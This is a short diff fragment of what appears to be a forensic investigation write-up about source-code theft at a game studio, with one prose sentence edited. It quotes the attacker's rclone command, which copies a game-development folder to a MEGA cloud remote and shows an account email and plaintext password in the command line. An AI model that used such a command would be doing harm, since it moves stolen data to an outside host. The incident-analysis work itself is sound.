j-manli/j-manli.github.io/investigations/emberforge-source-code-theft.md

 C:\Users\Public\rclone.exe copy C:\GameDev mega:exfil --mega-user jwilson.vhr@proton[.]me --mega-pass Summer2024! -v
 ```

-This execution exposed the cloud username and plaintext password directly in the command line.
+This exposed the cloud username and plaintext password directly in the command line.

 At `2026-01-30 23:11:44.379`, a later `rclone.exe` execution used the staged archive: